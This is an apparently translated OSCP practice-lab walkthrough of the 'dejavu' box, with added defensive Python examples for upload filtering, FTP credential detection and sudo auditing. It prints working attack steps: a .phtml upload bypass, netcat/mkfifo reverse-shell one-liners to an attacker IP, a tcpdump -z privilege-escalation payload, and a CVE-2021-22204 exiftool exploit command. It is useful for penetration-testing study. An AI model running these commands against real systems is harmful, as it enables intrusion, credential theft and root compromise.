OSCP Practice Lab
Lab introduction
dejavu | easy | information gathering, vulnerability discovery, file upload bypass, disable_functions bypass, tcpdump traffic capture & privilege escalation, exiftool vulnerability privilege escalation, CVE-2021-22204 privilege escalation
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scan
└─# nmap -sV -A -p- -T4 192.168.1.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 09:52 EST
Nmap scan report for dejavu (192.168.1.111)
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
| 256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_ 256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:D9:04:86 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms dejavu (192.168.1.111)
Directory scan
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.111 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.111
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.111/.php (Status: 403) [Size: 278]
http://192.168.1.111/.html (Status: 403) [Size: 278]
http://192.168.1.111/index.html (Status: 200) [Size: 10918]
http://192.168.1.111/info.php (Status: 200) [Size: 69958]
Gaining access
The hidden directory is found in the source of the info page (info.php).
Uploading a file with a .phtml extension bypasses the upload filter, but the PHP execution functions are disabled here (disable_functions).
We use the AntSword (蚁剑) plugin to bypass the disable_functions restriction, and the following script to get a reverse shell past it:
https://github.com/kriss-u/chankro-py3
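The .phtml bypass works because the upload filter rejects only the obvious extension while Apache's PHP module still executes .phtml. The following is an added example, not code from the original write-up or from the lab: it contrasts a denylist check of that kind with a content-based allowlist check. The function names, the denylist, the sample file names and the magic-byte table are constructed; the PHP_HANDLED set is taken from the FilesMatch pattern in the Debian/Ubuntu Apache PHP module configuration.

```python
"""Added example, not from the original write-up: why a denylist-based
upload filter passes a .phtml file, and an allowlist check that does not.
Function names, the denylist and the sample files are constructed."""
import posixpath
import secrets

# A naive upload filter of the kind that only refuses the obvious extension.
NAIVE_DENYLIST = {".php"}

# Extensions that the Debian/Ubuntu Apache PHP module configuration routes to
# the PHP handler (its FilesMatch pattern is ".+\.ph(ar|p|tml)$").
PHP_HANDLED = {".php", ".phar", ".phtml"}

# Image types the hardened check is willing to store, keyed by magic bytes.
MAGIC_TO_EXT = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}


def denylist_allows(filename: str) -> bool:
    """Weak check: accept anything whose extension is not on the denylist."""
    ext = posixpath.splitext(filename)[1].lower()
    return ext not in NAIVE_DENYLIST


def executes_as_php(filename: str) -> bool:
    """Would Apache with the PHP module run this file inside the web root?"""
    return posixpath.splitext(filename)[1].lower() in PHP_HANDLED


def safe_store_name(filename: str, content: bytes):
    """Hardened check: decide the stored name from the file content, not from
    the client-supplied name. Returns a fresh server-chosen name carrying an
    allowlisted extension, or None if the upload must be rejected."""
    base = posixpath.basename(filename)          # drop any path component
    claimed_ext = posixpath.splitext(base)[1].lower()
    if claimed_ext == ".jpeg":
        claimed_ext = ".jpg"
    for magic, real_ext in MAGIC_TO_EXT.items():
        if content.startswith(magic):
            if real_ext != claimed_ext:
                return None                       # name and content disagree
            # Server-chosen name: the client never controls the stored path.
            return f"upload_{secrets.token_hex(8)}{real_ext}"
    return None                                   # unknown or missing magic


if __name__ == "__main__":
    # Constructed inputs: a PHP payload with a .phtml name, and a JPEG header.
    print(denylist_allows("shell.phtml"), executes_as_php("shell.phtml"))
    print(safe_store_name("shell.phtml", b"<?php echo 1; ?>"))
    print(safe_store_name("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```

The denylist check says yes to shell.phtml and the handler table says Apache would execute it, which is exactly the gap the write-up exploits. The hardened check never trusts the client's name: the extension is derived from the content's magic bytes and the stored file name is generated server-side, so a double extension or an unexpected handler suffix cannot reach the web root.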
For convenience, the following commands spawn an interactive shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.103 8888 >/tmp/f
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Press Ctrl+Z
stty raw -echo;fg
reset
Privilege escalation
sudo -l shows that the robert user can run tcpdump without a password; GTFOBins has the corresponding privilege escalation command.
www-data@dejavu:/tmp$ sudo -l
Matching Defaults entries for www-data on dejavu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on dejavu:
(robert) NOPASSWD: /usr/sbin/tcpdump
COMMAND='nc 192.168.1.103 1212 -c /bin/bash'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo -u robert /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z robert
The reverse shell failed.
Uploading pspy64 to watch processes shows something logging in to an FTP server at regular intervals.
We use tcpdump to listen on the FTP port and capture the FTP login password:
sudo -u robert tcpdump -i lo port ftp
or
sudo -u robert /usr/sbin/tcpdump tcp port 21 -c 10 -w /tmp/tcp.txt -i lo
The captured password logs in to both FTP and SSH.
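The capture succeeds because FTP sends USER and PASS in the clear, so anyone who can read the interface, including a low-privileged user delegated tcpdump via sudo, sees the credential. The following is an added example, not code from the original write-up: it scans the control-channel text of an FTP session (the kind of text `tcpdump -A ... port 21` or a reassembled pcap stream shows) and reports each exposed login without copying the password into the report. The session text, user names and password strings are constructed.

```python
"""Added example, not part of the original write-up: find credentials sent in
the clear in an FTP control session. The session below is constructed; the
report records that a password was exposed and how long it was, never the
password value itself."""
import re

# Constructed sample of an FTP control session as it appears on the wire.
SAMPLE_SESSION = """\
220 (vsFTPd 3.0.3)
USER robert
331 Please specify the password.
PASS not-a-real-password
230 Login successful.
SYST
215 UNIX Type: L8
USER backup
331 Please specify the password.
PASS wrong
530 Login incorrect.
"""

FTP_COMMAND = re.compile(r"^(?P<verb>[A-Z]{3,4})(?:\s+(?P<arg>.*))?$")
FTP_REPLY = re.compile(r"^(?P<code>\d{3})[ -]")


def find_cleartext_logins(session_text: str):
    """Return one record per PASS command seen: which user it belongs to, the
    length of the exposed password, and whether the server accepted it
    (reply code 230). The password is deliberately not stored."""
    findings = []
    current_user = None
    pending = None  # a PASS that is still waiting for the server's reply
    for raw in session_text.splitlines():
        line = raw.strip()
        reply = FTP_REPLY.match(line)
        if reply:
            if pending is not None:
                pending["accepted"] = reply.group("code") == "230"
                findings.append(pending)
                pending = None
            continue
        cmd = FTP_COMMAND.match(line)
        if not cmd:
            continue
        verb, arg = cmd.group("verb"), cmd.group("arg") or ""
        if verb == "USER":
            current_user = arg
        elif verb == "PASS":
            pending = {"user": current_user, "password_len": len(arg), "accepted": None}
    if pending is not None:  # the capture ended before a reply arrived
        findings.append(pending)
    return findings


if __name__ == "__main__":
    for f in find_cleartext_logins(SAMPLE_SESSION):
        state = {True: "accepted", False: "rejected", None: "no reply"}[f["accepted"]]
        print(f"user={f['user']} password exposed ({f['password_len']} chars), {state}")
```

Run against a real capture, a non-empty result is the finding itself: the credential left the process boundary in plaintext. The fixes are on the transport and the delegation, not the capture tool: move the scheduled job to SFTP or FTPS, and do not hand tcpdump out through sudo (tcpdump also accepts -z, which runs a program after each file rotation, so the rule on this box is a command-execution rule, not a read-only one).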
robert@dejavu:~$ sudo -l
Matching Defaults entries for robert on dejavu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User robert may run the following commands on dejavu:
(root) NOPASSWD: /usr/local/bin/exiftool
exiftool is version 12.23; searchsploit has the exploit for that version.
exiftool -ver
or
head -n 15 exiftool
python3 50911.py -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.103 8188 >/tmp/f'
sudo exiftool image.jpg
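Both sudo rules on this box (www-data may run tcpdump as robert; robert may run exiftool as root) are the kind of delegation a host audit should flag before an attacker does, and the exiftool rule is made worse by the version. The following is an added example, not code from the original write-up: it parses `sudo -l` output into rules, flags delegated binaries from a short risk table, reads the version out of the exiftool script header (the `$version = '...'` line that `head -n 15 exiftool` reveals) and checks it against the CVE-2021-22204 affected range, 7.44 through 12.23 with the fix in 12.24. The two `sudo -l` listings are the ones from this write-up; the risk table and the exiftool header excerpt are constructed.

```python
"""Added example, not from the original write-up: audit `sudo -l` output for
delegated binaries that become command execution, and check an exiftool
version against CVE-2021-22204 (affected 7.44 through 12.23, fixed in 12.24).
The sudo -l text is copied from the write-up; the risk table and the exiftool
header excerpt are constructed."""
import re

# The two listings shown in the write-up.
WWW_DATA_SUDO_L = """\
Matching Defaults entries for www-data on dejavu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on dejavu:
    (robert) NOPASSWD: /usr/sbin/tcpdump
"""
ROBERT_SUDO_L = """\
Matching Defaults entries for robert on dejavu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User robert may run the following commands on dejavu:
    (root) NOPASSWD: /usr/local/bin/exiftool
"""
# Constructed excerpt of the exiftool Perl script header.
EXIFTOOL_HEADER = """\
#!/usr/bin/perl -w
#------------------------------------------------------------------------------
# File:         exiftool
# Description:  Read/write meta information
#------------------------------------------------------------------------------
my $version = '12.23';
"""

# Short constructed risk table covering the binaries this box delegates; a real
# audit would draw on a fuller GTFOBins-style list.
RISKY_BINARIES = {
    "tcpdump": "-z runs a post-rotate program as the run-as user",
    "exiftool": "writes files as the run-as user; 7.44-12.23 run code from crafted input (CVE-2021-22204)",
}

SUDO_RULE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+)$")
VERSION_ASSIGN = re.compile(r"\$version\s*=\s*'([\d.]+)'")


def parse_sudo_l(output: str):
    """Turn the rule lines of `sudo -l` into dicts: run-as user, NOPASSWD flag, command."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = SUDO_RULE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group(1).split(":")[0].strip()          # "(ALL : ALL)" -> "ALL"
        tags = {t.strip() for t in m.group(2).split(":") if t.strip()}
        for cmd in m.group(3).split(","):
            if cmd.strip():
                rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "command": cmd.strip()})
    return rules


def audit_sudo_rules(rules):
    """Flag rules whose binary is in RISKY_BINARIES; running as root is the worst case."""
    findings = []
    for r in rules:
        binary = r["command"].split()[0].rsplit("/", 1)[-1]
        if binary in RISKY_BINARIES:
            severity = "critical" if r["runas"] == "root" else "high"
            findings.append({**r, "binary": binary, "severity": severity, "why": RISKY_BINARIES[binary]})
    return findings


def exiftool_version_from_script(head: str):
    """Read the version from the `$version = '...'` assignment in the script header."""
    m = VERSION_ASSIGN.search(head)
    return m.group(1) if m else None


def affected_by_cve_2021_22204(version: str) -> bool:
    """True for exiftool 7.44 through 12.23 inclusive; 12.24 carries the fix."""
    v = tuple(int(p) for p in version.split("."))
    return (7, 44) <= v <= (12, 23)


if __name__ == "__main__":
    for listing in (WWW_DATA_SUDO_L, ROBERT_SUDO_L):
        for f in audit_sudo_rules(parse_sudo_l(listing)):
            print(f"[{f['severity']}] {f['command']} as {f['runas']} (NOPASSWD={f['nopasswd']}): {f['why']}")
    ver = exiftool_version_from_script(EXIFTOOL_HEADER)
    print("exiftool", ver, "affected by CVE-2021-22204:", affected_by_cve_2021_22204(ver))
```

The audit reports the tcpdump rule as high (execution as robert) and the exiftool rule as critical (execution as root, no password), and the version check confirms 12.23 sits inside the affected range. The remediation is the same in both cases: remove the delegation or replace it with a wrapper that fixes the arguments, and update exiftool to 12.24 or later.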
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】dejavu
Disclaimer: the programs (methods) in this article may be offensive in nature and are provided for security research and teaching only; readers who use this information for any other purpose bear full legal and joint liability, and this site bears none. For questions, contact us by e-mail (use a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the homepage).